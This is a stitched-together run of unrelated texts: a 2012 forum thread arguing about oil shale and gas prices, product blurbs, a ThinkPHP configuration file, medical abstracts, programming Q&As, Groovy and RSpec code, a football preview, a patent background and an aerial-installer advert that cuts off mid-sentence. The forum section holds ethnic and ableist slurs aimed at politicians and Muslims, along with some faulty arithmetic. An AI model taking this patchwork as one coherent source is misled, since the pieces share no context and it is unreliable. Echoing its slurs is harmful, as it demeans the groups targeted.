Iraq, and BO wouldn’t do anything due to his love for the Mullahs, hatred of the U.S. oil economy and general dull wittedness. What the Republicans and Demtreasonocrats alike should do, is preface their loser comments about oil with: “there’s nothing that a president can do about gasoline prices if he’s unimaginative, stupid and liberal, however….” Sam Adams Fiberal says: March 16, 2012 at 8:15 am The latest misperception out there -affecting the thinking of Republicans and Dumbasdirtcrats alike, is a meme that the president “can’t do anything about oil prices in foreign countries like Iran.” _________ Obama yesterday repeated the statement that we consume 20% of the world’s oil while only having 2% of the world’s reserves. Simply put…this is a lie. Oil shale in the US holds 2 trillion barrels of oil. Yet we have had a moratorium on the development of oil shale on federal lands since Clinton was in office. Currently the us uses about 5 million barrels per day. Two trillion barrels of oil would tide us over for 333,333 days or 913 years. Say that only a third of that oil is recoverable, that’s only 300 years. Will it take years and years to develop that resource? Yep. So let’s get started now. AC, I’m sure you have some source supporting your opinion. A DOE study during the Bush administration predicted that oil recovery from oil share would be economically viable if the price of oil was above $50.00 per barrel. But that misses the fundamental point. With a moratorium on its development, private industry can’t determine if it is economical or not. They have no incentive to develop new technology or new approaches that may significantly decrease the cost of recovering this oil. Lift the moratorium, lease the lands and let private industry determine how to best recover this resource. After all, we are talking about a resource worth $200,000,000,000,000 at current oil prices. That is more than 10 times the size of the national debt. I think we can figure out a way of making it work. wingmann Why would any ENEMY of the USA want bHUSSEINo out of office? He and his putrid progressive clan are doing a splended job of killing the USA at this moment! Obama yesterday repeated the statement that we consume 20% of the world’s oil while only having 2% of the world’s reserves. Sam, It’s not only a lie, it’s irrelevant. So what if we use 99% of the world’s oil? Its not like we drink the stuff. So what if we use a lot of oil? That’s what a large, successful economy does, BO- you dumb fragile-X, moose-copulator. Since when is a soveriegn (sic) nation not supposed to act in its own interest? Since when does a country have to be obligated to conserve in the interest of other countries? Like which ones? China? Someone needs to tell liberals that the U.S. is not just any other country. We put our oil to great use not just in our own interest, but in the free-markets that benefit the industries and markets and ultimate freedom of other countries. Unlike other countries, the U.S. actually produces good things with its wealth. And BTW it has been through western technology that oil wells have been discovered, developed and modernized. Same with the refinement process. In contrast, Saudi Arabia nationalized their oil wells after accepting U.S. development and an agreement to export cheap oil to us. And then what did they do? Joined a cartel. In any event, we pay for oil. Payment represents an agreement between two parties called free-enterprise. That oil is on the global market. If it were up to me, we would have taken every last drop of oil out of Saudi Arabia a long time ago. And dared any camel-drop Mullah to do something about it. If countries want oil, then industrialize and compete for it. Don’t expect the U.S. to try and be “fair” by doing things not in our own economic interest. What is the end game for doing that? I mean, just what is the carrying capacity of the U.S. for other countries? When do we sit down and answer that f’ing question instead forcing benevolence on the part of the consumer-tax payer? Ronpaul was close…so close …and then put on red swim flippers, got up on the roof and started clucking like a chicken. Just a little more Aricept might have done it. . Sam, I’m glad you are able to listen to this BO POS, bc I can’t. I would never know what’s coming out of his foul mouth next unless I read about it. AC The spam filter limits the number of links, so here are two places to get started: Oil shale contains kerogen, which must be upgraded to crude oil through an energy and water intensive process. The point I was making is this: When you see an estimate for oil shale being economically feasible at around $100 a barrel (which likely won’t fall far due to water and natgas input costs), you have to remember that the number being quoted is the price point at which oil shale recovery, anywhere, in any quantity becomes profitable. Of the two trillion or so BOE of shale oil resources, that number is based on the most cherry picked of extraction sites. The best quality oil shale in the most convenient location doesn’t even become profitable until we hit that point. As with every mined resource, oil shale exists along a spectrum of recovery costs. The numbers you see represent the tip of the low end of the range if it is scaled up to huge economies of scale. The two trillion BOE number is a hypothetical. While it might be possible to recover all of that, given enough time and money, the hard to get stuff will never be economically feasible. It might as well be on the moon. While we could get it if we wanted, the lack of a profit motive means it won’t be recovered. There exists a price point above which a resource costs more than it is worth. The point I was making is that much of the hypothetical two trillion BOE exists above that point. We should be aggressively cutting the red tape currently strangling unconventional oil recovery. We need more domestic oil and we need more oil jobs. What won’t help is pretending we have more cheap oil than we really do. The best of the shale resources aren’t cheap, and statistically, most of them are more expensive than the cheapest of the oil shale. We have to admit the limitations and begin working around them, such as through an aggressive buildout of next generation nuclear reactors. AC Ronpaul was close…so close …and then put on red swim flippers, got up on the roof and started clucking like a chicken. Just a little more Aricept might have done it. Meanwhile, the cool and collected Mitt Romney will act like a dignified and proper blueblooded Northeasterner while presiding over budget, currency, and debt disasters. Who says doom can’t have class and sophistication? Fiberal They have no incentive to develop new technology or new approaches that may significantly decrease the cost of recovering this oil. Sam, That’s absolutely right. Where there are profits everything changes, especially technology. That (and of course, war) is key to innovation. (BTW there would be no one left to post on Moonbattery if everyone listened to AC – we would all have slit our wrists by now.) Fiberal Who says doom can’t have class and sophistication? Well, one has to keep up appearances. AC Let me restate the problem as an analogy: there is a ton of shipwrecked treasure on the seafloor. Some of it, like that on the Atocha, can be recovered inexpensively and in large quantity. It would be a mistake to assume that the economics of recovering Atocha treasure applied to every shipwreck. Atocha sunk in 55 feet of water off the Florida Keys. You can swim in the ocean and see the wreck with your own eyes. Good luck doing that with the wreck of the Titanic, which lies under 12,500 feet of water in the frigid North Atlantic. AC In oil industry jargon, everything on the Titanic is technically recoverable. Hell, the ship itself is technically recoverable. That doesn’t mean that any private enterprise can expect to make a profit doing so. Fiberal Sure AC, there are planets made out of solid diamond. That doesn’t mean that it would be feasible to go there with a pick-ax. It’s not profound or interesting to explain how a resource becomes more costly than profitable at a certain point. Of course, there are always projects like that; some are just a priori-patently stupid, like windmills. But others can go somewhere. If you know you have profits at the beginning and the potential for more profits going forward, you invest. And by the time you get to the break-even point, the technology you started with may be antiquated. If not, bail. What is important is to get started if you have a certain predictable return. You may then discover a worm hole. And BTW a nuclear power plant shouldn’t necessarily prohibit fracking or the other way round – just don’t put the two together on the same acre of land. AC Yes, we should get started with shale oil. All I said was that the two trillion BOE number cannot be reliably used as the basis for estimating how many years of reserves we have. Shale oil projects can go somewhere, just not in the quantity suggested by the numbers being thrown around. ANWR can go somewhere, but it won’t get us off foreign oil. Deepwater drilling can go somewhere, but it won’t revitalize the economy because of the high cost of extraction. Our energy strategy needs to be an all of the above, but we must be realistic about what we can expect for returns. If you’re so excited about shale oil then feel free to invest as much as you like. What’s left of our capitalist system permits you to take that risk. If you’re right, you’ll become fabulously wealthy. AC Opined: “The point I was trying to make is that there is a difference between reserves, technically recoverable reserves, and economically recoverable reserves. There is actually no oil in oil shale. Oil shale contains kerogen, which must be upgraded to crude oil through an energy and water intensive process.” ___________ Technology changes economic feasibility every day. I remember well discussions as to whether it was feasible to create a silicon chip with 64k of memory. Same thing with oil shale; while it might be uneconomical to mine the stuff and process it in a retort, in-situ processing changes both the economics as well as the amount of water needed for the process. As to oil shale not actually containing any “oil”…I believe you would find my credentials on the topic satisfactory for our purposes. “The two trillion BOE number is a hypothetical.” _________________ It’s not really hypothetical; it is an estimate of how much “oil” is there, not how much is economically recoverable. ______________ “We should be aggressively cutting the red tape currently strangling unconventional oil recovery. We need more domestic oil and we need more oil jobs. What won’t help is pretending we have more cheap oil than we really do. The best of the shale resources aren’t cheap, and statistically, most of them are more expensive than the cheapest of the oil shale.” __________ The oil produced from oil shale is much more suitable for use as diesel fuel than gasoline. Since politicians are bound and determined to spend public money, one could argue that the defense department should get involved in developing this resource, purely on the basis of national defense, whether in the sort to mid term its development has any influence on gas prices or not. If the Straits of Hormuz get blocked, it would be nice to know that we have some energy alternatives. And….in-situ extraction, using nuclear power to heat the rock makes excellent sense if you want to produce liquid fuels. Sam Adams Let the left traffick in hopium. Conservatives deal in facts. __________________ Good engineers can develop technology that can be game changers. AC Portable nuclear reactors as a source for the conversion heat is a game changer, but that is going to be off the table for, well, forever. Current shale oil economics are governed heavily by the price of natural gas, and also, the ability to get natural gas from a well to a shale oil mine (same with water). No matter what engineers develop, mining shale oil is going to be expensive and energy intensive. The best we can hope for is a lesser degree of bad. Even with nuclear, it’s still a low EROEI process. You and I understand the limitations of the two trillion BOE number, however the broader public doesn’t. The tangent began when I attempted to qualify what that number meant in the broader scope. Oil shale does not contain oil. It contains kerogen, which can be converted to oil at significant expense and with significant resource inputs. People need to understand the process is not as simple as digging up rocks and squeezing black liquid out. Shale oil is no Spindletop and it never will be. I don’t expect shale resources to bring the price down to provide broader economic relief. If anything, the price of crude will continue climbing as long as Helicopter Ben keeps printing money at a frenzied pace. http://www.rand.org/pubs/research_briefs/RB9143/index1.html “As for in-situ retorting — heating oil shale in place and extracting it from the ground — Shell Oil Company has successfully conducted a small-scale field test based on slow underground heating using electric power. While larger-scale tests are needed, Shell anticipates that this in-situ method will be competitive at crude oil prices in the mid-$20s per barrel.” That’s right; Shell’s process can be profitable selling oil in the $20 to $30 per barrel range. Their process requires minimal water and uses electricity for heating the oil shale in place. A 160 acre tract of land could produce 300 million barrels. Of course the EPA’s clean air act has a huge effect on economics, based upon allowable sulfur content of the fuel, and public policy has whipsawed prospects for oil shell development for sixty years. _____________ Oil shale does not contain oil. It contains kerogen, which can be converted to oil at significant expense and with significant resource inputs. People need to understand the process is not as simple as digging up rocks and squeezing black liquid out. ____________ Shell also developed in place hydrogenation of the oil. The economics, IMHO, look very promising as a way to produce primarily diesel fuel. Of course oil shale doesn’t contain “oil” and heat is required to convert the kerogen to liquid and gaseous hydrocarbons. Unfortunately many people aren’t interested in the technical details; I attribute it to the public schooling that has been provided to the masses. Still, if oil shale development could bring the price of diesel below $3.00 per gallon, that could have a very positive effect upon the economy, let alone benefit German car manufacturers.
The Avion has quickly established itself as a favourite in many industries in New Zealand. Excellent fit to a wide variety of facial types along with a solid feel, light weight and comfortable construction. The ballistic Vo rating of the Avion makes it a "go to" for many safety practitioners. Heavy Duty Safety Mesh is a simple means of fencing your working environment. Heavy duty safety mesh is capable of free standing however, best when used in conjunction with posts or waratahs it provides a solid temporary fencing solution. Light Duty Safety Mesh is ideal for temporary use on construction sites as well as crowd and pedestrian management at your event. This plastic mesh fencing is affordable and great in many environments. The Taipan work glove is made from premium 13 gauge black nylon and offers outstanding comfort and dexterity, as well as excellent breathability, keeping hands cooler with less perspiration. These protective work gloves also feature a crinkled rubber latex coating on the palm for excellent grip in both wet and dry environments.
<?php use think\facade\Env; return [ // 应用名称 'app_name' => Env::get('app.app_name', false), // 应用版本 'app_version' => Env::get('app.app_version', '1.0.0'), // 应用地址 'app_host' => Env::get('app.app_host', ''), // 应用调试模式 'app_debug' => Env::get('app.app_debug', false), // 应用Trace 'app_trace' =>Env::get('app.app_trace', false), // 是否支持多模块 'app_multi_module' => true, // 入口自动绑定模块 'auto_bind_module' => false, // 注册的根命名空间 'root_namespace' => [], // 默认输出类型 'default_return_type' => 'html', // 默认AJAX 数据返回格式,可选json xml ... 'default_ajax_return' => 'json', // 默认JSONP格式返回的处理方法 'default_jsonp_handler' => 'jsonpReturn', // 默认JSONP处理方法 'var_jsonp_handler' => 'callback', // 默认时区 'default_timezone' => 'Asia/Shanghai', // 是否开启多语言 'lang_switch_on' => false, // 默认全局过滤方法 用逗号分隔多个 'default_filter' => '', // 默认语言 'default_lang' => 'zh-cn', // 应用类库后缀 'class_suffix' => false, // 控制器类后缀 'controller_suffix' => false, // +---------------------------------------------------------------------- // | 模块设置 // +---------------------------------------------------------------------- // 默认模块名 'default_module' => 'index', // 禁止访问模块 'deny_module_list' => ['common'], // 默认控制器名 'default_controller' => 'Index', // 默认操作名 'default_action' => 'index', // 默认验证器 'default_validate' => '', // 默认的空模块名 'empty_module' => '', // 默认的空控制器名 'empty_controller' => 'Error', // 操作方法前缀 'use_action_prefix' => false, // 操作方法后缀 'action_suffix' => '', // 自动搜索控制器 'controller_auto_search' => true, // +---------------------------------------------------------------------- // | URL设置 // +---------------------------------------------------------------------- // PATHINFO变量名 用于兼容模式 'var_pathinfo' => 's', // 兼容PATH_INFO获取 'pathinfo_fetch' => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'], // pathinfo分隔符 'pathinfo_depr' => '/', // HTTPS代理标识 'https_agent_name' => '', // IP代理获取标识 'http_agent_ip' => 'X-REAL-IP', // URL伪静态后缀 'url_html_suffix' => 'html', // URL普通方式参数 用于自动生成 'url_common_param' => false, // URL参数方式 0 按名称成对解析 1 按顺序解析 'url_param_type' => 1, // 是否开启路由延迟解析 'url_lazy_route' => false, // 是否强制使用路由 'url_route_must' => false, // 合并路由规则 'route_rule_merge' => false, // 路由是否完全匹配 'route_complete_match' => false, // 使用注解路由 'route_annotation' => false, // 域名根,如thinkphp.cn 'url_domain_root' => '', // 是否自动转换URL中的控制器和操作名 'url_convert' => true, // 默认的访问控制器层 'url_controller_layer' => 'controller', // 表单请求类型伪装变量 'var_method' => '_method', // 表单ajax伪装变量 'var_ajax' => '_ajax', // 表单pjax伪装变量 'var_pjax' => '_pjax', // 是否开启请求缓存 true自动缓存 支持设置请求缓存规则 'request_cache' => false, // 请求缓存有效期 'request_cache_expire' => null, // 全局请求缓存排除规则 'request_cache_except' => [], // 是否开启路由缓存 'route_check_cache' => false, // 路由缓存的Key自定义设置(闭包),默认为当前URL和请求类型的md5 'route_check_cache_key' => '', // 路由缓存类型及参数 'route_cache_option' => '', // 默认跳转页面对应的模板文件 'dispatch_success_tmpl' => Env::get('think_path') . 'tpl/dispatch_jump.tpl', 'dispatch_error_tmpl' => Env::get('think_path') . 'tpl/dispatch_jump.tpl', // 异常页面的模板文件 'exception_tmpl' => Env::get('think_path') . 'tpl/think_exception.tpl', // 错误显示信息,非调试模式有效 'error_message' => '页面错误!请稍后再试~', // 显示错误信息 'show_error_msg' => false, // 异常处理handle类 留空使用 \think\exception\Handle 'exception_handle' => '', ];
An evaluation of HIV partner counseling and referral services using new disposition codes. New Centers for Disease Control recommendations suggest that all persons with newly diagnosed HIV receive partner counseling and referral services (PCRS). We evaluated the King County, WA, PCRS program using a new set of disposition codes that disaggregate the components of PCRS (notification, testing, and test results), distinguish verified and unverified outcomes, and differentiate outcomes that occur before and after cases receive PCRS. Between 2005 and 2007, 427 (65%) of 659 persons with newly diagnosed HIV received PCRS. The number of cases staff needed to interview to identify 1 new case of HIV varied from 12.2 to 47.4 depending on whether number needed to interview was defined to include both verified and unverified outcomes and whether it excluded partners diagnosed with HIV before cases' receipt of PCRS. Age <25, testing HIV negative within the last year, receipt of PCRS within 58 days of HIV diagnoses, and participation in a program to link persons with HIV to medical care were significantly associated notifying more partners. PCRS evaluations may overestimate success because of limitations inherent in Centers for Disease Control PCRS disposition codes. Efforts to promote frequent HIV testing, assure timely provision of PCRS, and integrate PCRS with programs that link patients to care may improve PCRS outcomes.
Ask HN: Pricing question for a 'moonlighting project' for a company - dthakur I've been approached by a mid-size company looking to develop something similar to a shareware project I have available out there.<p>How does one go about valuing this kind of work?<p>The project is supposed to take 4-6 weeks to complete. The project is C++ development in a specific field (Wifi). I'm leveraging my existing code (say 50%) to build their product.<p>Some thoughts and pointers would be great. ====== byoung2 Price it based on the value to them, not on how many hours it takes you to create. If it means they can cut costs by $5000 per month, price based on that. A good example is hotel reservation/booking systems. It only takes a few days to integrate one into a website and tie it with the hotel's in-house system, but you wouldn't charge them a few hundred dollars. Instead, you charge them a percentage of every booking, because it means fewer calls to their reservation line (= money saved). ------ michael_dorfman Lots of variables: Who owns the rights to the product when you're done? You or them? That should be a factor in the pricing, of course. Do you have a clear spec? (If the answer is no, get one or make one.) How confident are you in your time-estimate of 4-6 weeks? Do you feel comfortable taking the risk (i.e., doing it for a fixed price), or do you want to push the risk to them (i.e., work on it at an agreed-upon hourly rate, for however long it takes)? ~~~ dthakur Thanks for the input. It is their product and I'll incorporate this info into the pricing factors, thanks. I have somewhat of a spec but it needs more review before it can be considered a serious set of requirements. Time-estimate is fine. I'd rather do it for a fixed price -- the company did agree to have a term structure for compensation 15% at start, 15% at first milestone etc.
Q: Swift Sprite Kit Camera Movement I made a Camera in Sprite Kit focusing on a SKSpriteNode. There is a great Document by Apple: Apple Document However, the camera as it now is follows the SKSpriteNode immediately, while I want to have a little leeway. For e.g. the SKSpriteNode moves up and down after a touch is made, the camera follows the SKSpriteNode slowly from its origin point, and the maximum distance Height for the SKSpriteNode is half of the screen, and when the SKSpriteNode stands still, the camera and the SKSpriteNode move again to their origin point. Also the PhysicBody's of the Nodes behave strangely, moving away from its actual image. How can I fix that ? Here is my Code: class GameScene: SKScene, SKPhysicsContactDelegate { var Player: SKSpriteNode! var Platform0: SKSpriteNode! var Platform1: SKSpriteNode! var Platform2: SKSpriteNode! var Platform3: SKSpriteNode! var Platform4: SKSpriteNode! var Platform5: SKSpriteNode! var World: SKNode! var Camera: SKNode! override func didMoveToView(view: SKView) { /* Setup your scene here */ self.physicsWorld.contactDelegate = self self.anchorPoint = CGPoint(x: 0.5, y: 0.1) self.World = SKNode() self.World.name = "World" addChild(self.World) self.Camera = SKNode() self.Camera.name = "Camera" self.World.addChild(self.Camera) SpawnPlatforms() SpawnPlayer() } func SpawnPlatforms() { Platform0 = SKSpriteNode (color: SKColor.greenColor(), size: CGSize(width: self.frame.size.width , height: 25)) Platform0.position = CGPoint(x: self.frame.size.width / 2, y: 40) Platform0.zPosition = 1 Platform0.physicsBody = SKPhysicsBody(rectangleOfSize:Platform0.size) Platform0.physicsBody?.dynamic = false Platform0.physicsBody?.allowsRotation = false Platform0.physicsBody?.restitution = 0 Platform0.physicsBody?.usesPreciseCollisionDetection = true Platform0.physicsBody?.categoryBitMask = Platform0Category Platform0.physicsBody?.collisionBitMask = PlayerCategory Platform0.physicsBody?.contactTestBitMask = PlayerCategory World.addChild(Platform0) /// All other Platforms declared as the same above } func SpawnPlayer(){ var Player1:SKTexture! var Player2:SKTexture! var Animation:SKAction! var AnimationRepeat:SKAction! Player1 = SKTexture(imageNamed: "Image.png") Player1.filteringMode = .Nearest Player2 = SKTexture(imageNamed: "Image2.png") Player2.filteringMode = .Nearest Animation = SKAction.animateWithTextures([Player1,Player2], timePerFrame: 0.5) AnimationRepeat = SKAction.repeatActionForever(Animation) Player = SKSpriteNode (imageNamed: "Image.png") Player.size = CGSize(width: 64, height: 64) Player.position = CGPoint(x: self.frame.size.width / 2, y: 80) Player.zPosition = 2 Player.physicsBody = SKPhysicsBody(rectangleOfSize:CGSize(width: 35, height: 50)) Player.physicsBody?.dynamic = true Player.physicsBody?.allowsRotation = false Player.physicsBody?.restitution = 0 Player.physicsBody?.usesPreciseCollisionDetection = true Player.physicsBody?.velocity = CGVector(dx: 0, dy: -0.1) Player.physicsBody?.categoryBitMask = PlayerCategory Player.physicsBody?.collisionBitMask = Platform0Category Player.physicsBody?.contactTestBitMask = Platform0Category | Platform1Category | Platform2Category | Platform3Category | Platform4Category | Platform5Category Player.runAction(AnimationRepeat) World.addChild(Player) } override func didFinishUpdate() { Camera.position = CGPoint(x: Player.position.x, y: Player.position.y) self.centerOnNode(Camera) } func centerOnNode(node: SKNode) { let cameraPositionInScene: CGPoint = node.scene!.convertPoint(node.position, fromNode: World) node.parent!.position = CGPoint(x:node.parent!.position.x - cameraPositionInScene.x, y:node.parent!.position.y - cameraPositionInScene.y) } A: Instead of directly declaring the position in centeronnode, use SKAction moveTo. It has a duration value. Replace your old centerOnNode func with: func centerOnNode(node: SKNode) { let cameraPositionInScene: CGPoint = node.scene!.convertPoint(node.position, fromNode: World) node.parent!..runAction(SKAction.moveTo(CGPoint(x:node.parent!.position.x - cameraPositionInScene.x, y:node.parent!.position.y - cameraPositionInScene.y), duration: 1)) } That should work, but I have't tested it sorry. Update for Swift 3 func centerOnNode(node: SKNode) { let cameraPositionInScene: CGPoint = node.scene!.convert(node.position, from: World) node.parent!.run(SKAction.move(to: CGPoint(x:node.parent!.position.x - cameraPositionInScene.x, y:node.parent!.position.y - cameraPositionInScene.y), duration: 1)) }
What can the Republic of Ireland expect from Bulgaria? The Republic of Ireland face Bulgaria in a friendly on Tuesday evening as they gear up for next month’s crucial Euro 2020 double-header against Georgia and Switzerland. Here, the PA news agency takes a look at what lies in wait for manager Mick McCarthy and his players. Head coach Krasimir Balakov took over this year (John Walton/PA) Krasimir Balakov was appointed as Bulgaria’s new head coach in May this year, succeeding former team-mate Petar Hubchev after he stood down following draws against Montenegro and Kosovo in the first two Euro 2020 qualifiers. Capped 92 times by his country and a member of the side which finished fourth at the 1994 World Cup finals, the 53-year-old former midfielder has managed in Switzerland, Croatia and Germany as well as in his native country. Star man Kiril Despodov, right, is a stand-out (Nick Potts/PA) Kiril Despodov, who can play either as a winger or a striker, has been tipped to have a bright future in international football but was used only as a second-half substitute in Saturday’s 4-0 defeat by England at Wembley. Brazilian-born wide-man Wanderson, who has been granted Bulgarian citizenship after helping club Ludogorets win five league titles, started against Gareth Southgate’s men but at 31 cannot be said to represent the future. Pedigree Dimitar Berbatov, right, is a former Bulgaria international (Chris Radburn/PA) Bulgaria’s finest hour came in the United States 25 years ago when a team which included Balakov, Hubchev, Yordan Letchkov and Hristo Stoichkov was denied a place in the World Cup finals by Roberto Baggio’s double for Italy. Defeat in the third/fourth-place play-off by Sweden was no disgrace, but a nation which has produced the likes of Stiliyan Petrov and Dimitar Berbatov has failed to qualify for the finals of a major tournament since 2004. Recent form Harry Kane put Bulgaria to the sword on Friday (Tim Goode/PA) Balakov got his job after a disappointing start to the Euro 2020 qualifying campaign, but things have gone from bad to worse since. The two points Bulgaria – ranked 60th in the world – collected from their opening Group A fixtures under Hubchev remain the only two in their account, with successive defeats by the Czech Republic, Kosovo and England leaving them at the foot of the table on goal difference and without a win in their last eight outings. Head-to-head The Republic faced Bulgaria in 2010 qualifiers (Chris Radburn/PA) Ireland and Bulgaria have met on nine occasions since the the 1978 World Cup campaign, and the Bulgarians currently lead 3-2 in terms of victories with both sides winning at home and losing away in European qualifiers for the 1980 and 1988 finals. The last three encounters, a 2004 friendly in Dublin and home and away World Cup qualifiers in 2009, have ended in 1-1 draws.
A case is commonly used for containing things. Conventional cases are of two types. One type has a separate case body and case cover. The other type has the cover connected by ordinary means for movement on the body. However, the former case has been found to suffer from the case cover falling down on the ground if opened carelessly. The later case has been found to suffer from the need to use two hands when opening the case cover. This is inconvenient when one desires to hold things with one hand, and to use the other to take things out of the case. Having reviewed the above-mentioned disadvantages in conventional cases, the present invention is disclosed below with the improvements in a case which comprises one embodiment of the present invention.
/* * Copyright 2011-2020 CaboLabs Health Informatics * * The EHRServer was designed and developed by Pablo Pazos Gutierrez <pablo.pazos@cabolabs.com> at CaboLabs Health Informatics (www.cabolabs.com). * * You can't remove this notice from the source code, you can't remove the "Powered by CaboLabs" from the UI, you can't remove this notice from the window that appears then the "Powered by CaboLabs" link is clicked. * * Any modifications to the provided source code can be stated below this notice. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.cabolabs.ehrserver.openehr.common.change_control import com.cabolabs.ehrserver.openehr.common.generic.AuditDetails import com.cabolabs.ehrserver.ehr.clinical_documents.CompositionIndex import javax.xml.bind.annotation.XmlAccessorType import javax.xml.bind.annotation.XmlAccessType // FIXME: this is the representation of a VERSION<COMPOSITION> not VERSION<T> class Version { // Now assigned by the client: // https://github.com/ppazos/cabolabs-ehrserver/issues/50 // // FIXME: https://github.com/ppazos/cabolabs-ehrserver/issues/52 // // object_id, creating_system_id and version_tree_id. // // Emula ORIGINAL_VERSION.uid, ORIGINAL_VERSION hereda de VERSION // - object_id (id del VERSIONED_OBJECT), // - creating_system_id (identificador del sistema donde se creó la versión) and // - version_tree_id (es el número de version y branch que se crea cuando se piden datos para modificar // (no creo que sea necesario tener asignar números de branch cuando se piden datos solo para leer)). // Como no hay modificaciones (por ahora) el version_tree_id siempre va a ser 1 // (debe ser asignado por el servidor cuando se hace commit de un documento). // // Ej. 591eb8e8-3a65-4630-a2e9-ffdeafc9bbba::10aec661-5458-4ff6-8e63-c2265537196d::1 // // El id lo establece el EHR Server cuando recibe un commit. // String uid String precedingVersionUid // Emula ORIGINAL_VERSION.lifecycle_state.code_string String lifecycleState AuditDetails commitAudit // Datos commiteados (referencia a la composition) CompositionIndex data Contribution contribution String fileLocation /** * +1 on the uid.versionTreeId.trunkVersion, it is used to generate a new uid for the new version. * @return */ def addTrunkVersion() { def newUid = this.objectId +"::"+ this.creatingSystemId +"::"+ (new Integer(this.versionTreeId) + 1).toString() this.uid = newUid } // These methods emulate version.uid.[objectId, creatingSystemId, treeVersionId] /** * id de la composition que contiene la version * * @return String UUID */ def getObjectId() { return uid.split("::")[0] } /** * id del sistema que commitea los datos (donde fue creada la version) * * @return String */ def getCreatingSystemId() { return uid.split("::")[1] } def getVersionTreeId() { return uid.split("::")[2] } static transients = ['objectId', 'creatingSystemId', 'versionTreeId'] static belongsTo = [Contribution] static constraints = { contribution(nullable: false) // La version debe estar dentro de una contribution lifecycleState(inList: ['532', '553', '523']) // complete, incomplete, deleted precedingVersionUid(nullable: true) fileLocation(maxSize:1024) } static namedQueries = { byOrgInPeriod { uid, from, to -> contribution { eq('organizationUid', uid) } commitAudit { ge('timeCommitted', from) // dfrom <= timeCommitted < dto lt('timeCommitted', to) } } } }
2m Composite LIDAR Digital Surface Model Light Detection and Ranging (LIDAR) is an airborne mapping technique, which uses a laser to measure the distance between the aircraft and the ground. Up to 100,000 measurements per second are made of the ground, allowing highly detailed terrain models to be generated at spatial resolutions of between 25cm and 2 metres. The Environment Agency's LIDAR data archive contains digital elevation data derived from surveys carried out by the Environment Agency and represents over 10 years of survey work carried out by a specialist remote sensing team based in Bath and Coventry. Accurate elevation data is available for approximately 50% of England and Wales.This dataset is derived from a combination of our full dataset which has been merged and re-sampled to give the best possible coverage. The dataset is 2m resolution and is supplied as a Digital Surface Model produced from the signal returned to the LIDAR (which includes heights of objects, such as vehicles, buildings and vegetation, as well as the terrain surface).
Q: Joining two strings using rlike I am joining the tables Table_A and Table_B on columns Col_A and Col_B. Below are some test sample values. Table_A, Col_A USA1FullCover USAMainland USA2Islands Table_B, Col_B USA USA1 USA2 When joining, I need to match the value 'USA' followed by a number exactly. For instance, the join result should look like this. Col_A Col_B USA1FullCover USA1 USAMainland USA USA2Island USA2 I'm trying to achieve this in MySQL. I tried the rlike function. But the issue is that with rlike, I am not able to completely match them. select case when 'USA1FullCover' rlike 'USA' then 1 else 0 end; #matches, but shouldn't select case when 'USA1FullCover' rlike 'USA1' then 1 else 0 end; #matches, which is what I need/expect select case when 'USA1FullCover' rlike 'USA2' then 1 else 0 end; #doesn't match, which is what I need/expect My question is how can I fix the rlike so that the first case doesn't happen i.e. it doesn't match when there is no digit on the RHS? Or is it possible using regex? Taking a substring of the LHS doesn't help since we cannot really define the length beforehand. A: Use col_A regexp '^USA[0-9]{1}.+$' to match USA followed by exactly one digit followed by any other characters. To join only when such pattern exists select a.*,b.* from tableA a join tableB b on case when a.col_A regexp '^USA[0-9]{1}.+$' then substring(a.col_A,1,4) else '' end = b.col_B
# frozen_string_literal: true require 'rubocop/ast/sexp' RSpec.describe RuboCop::Cop::VariableForce::Reference do include RuboCop::AST::Sexp describe '.new' do context 'when non variable reference node is passed' do it 'raises error' do node = s(:def) scope = RuboCop::Cop::VariableForce::Scope.new(s(:class)) expect { described_class.new(node, scope) } .to raise_error(ArgumentError) end end end end
The tolerance and efficacy of preoperative chemoradiotherapy followed by gastrectomy in operable gastric cancer, a phase II study. The aim of study was to assess the tolerance and effectiveness of preoperative chemoradiotherapy in the group of 40 patients with operable gastric cancer. The therapy was well tolerated. We observed the high rate of pathological response and R0 resections, low rate of local recurrence and high percent of 2-year survival.
Q: swfobject: Absolute position link over flash in all PC browsers I have a number of flash ads (installed with swfobject) which have an HTML link placed over the top of them. I am using wmode transparent and it works fine in every browser on mac however ie/chrome/ff on PC (viewing on win7) the link falls behind the flash. I have also tried wmode=opaque to no avail. Here is the HTML: <a href="$Link" class="overlay"></a> <div class="flashContainerSml"> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="125" height="125"> <param name="movie" value="$Flash.URL" /> <param name="wmode" value="transparent" /> <!--[if !IE]>--> <object type="application/x-shockwave-flash" data="$Flash.URL" width="125" height="125"> <param name="wmode" value="transparent" /> <!--<![endif]--> <p>no flash</p> <!--[if !IE]>--> </object> <!--<![endif]--> </object> </div> and the appropriate css #sideBar .smallAd .overlay { position: absolute; top: 0; left: 0; z-index: 9999; width: 100%; height: 100%; } A: It was simple in the end. Notice the transparent gif in the link. <a href="$Link" class="overlay"><img src="$ThemeDir/images/transparent.gif" /></a> <div class="flashContainerSml"> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="125" height="125"> <param name="movie" value="$Flash.URL" /> <param name="wmode" value="opaque" /> <!--[if !IE]>--> <object type="application/x-shockwave-flash" data="$Flash.URL" width="125" height="125"> <param name="wmode" value="opaque" /> <!--<![endif]--> <p></p> <!--[if !IE]>--> </object> <!--<![endif]--> </object> </div>
Smart Digital are an RDI LB certified registered digital aerial installation company, All the materials we supply and install are digital approved and of benchmark quality, why settle for less?, we won't. We supply and install a wide range of digital aerials and satellite systems that once installed enhance your viewing time with crystal clear picture and sound quality. BBC freesat HDR (high definition recorder) Humax Foxsat HDR at just £379.00 inc vat and expert standard installation, our HDR system price also includes a quad LNB which will allow for extra receivers to be installed at a later date with minimal cost. Had a written quote from another company? we will beat the price, match the equipment like for like and even upgrade to digital approved materials if our competitor has quoted for lesser quality equipment. Free written quotations and surveys. Our family run company has locally based RDI_LB qualified engineers working in Dorking we are therefore usually able to offer a same day service when required. Our qualified installation engineers backed by the customer service team in the office will ensure that you receive the type of service you would want to recommend to your friends and family. The Smart No risk guarantee As well as our 12 months written guarantee our customers also have the peace of mind of our 14 day money guarantee, if for any reason you are not completely happy with your new installation just give us a 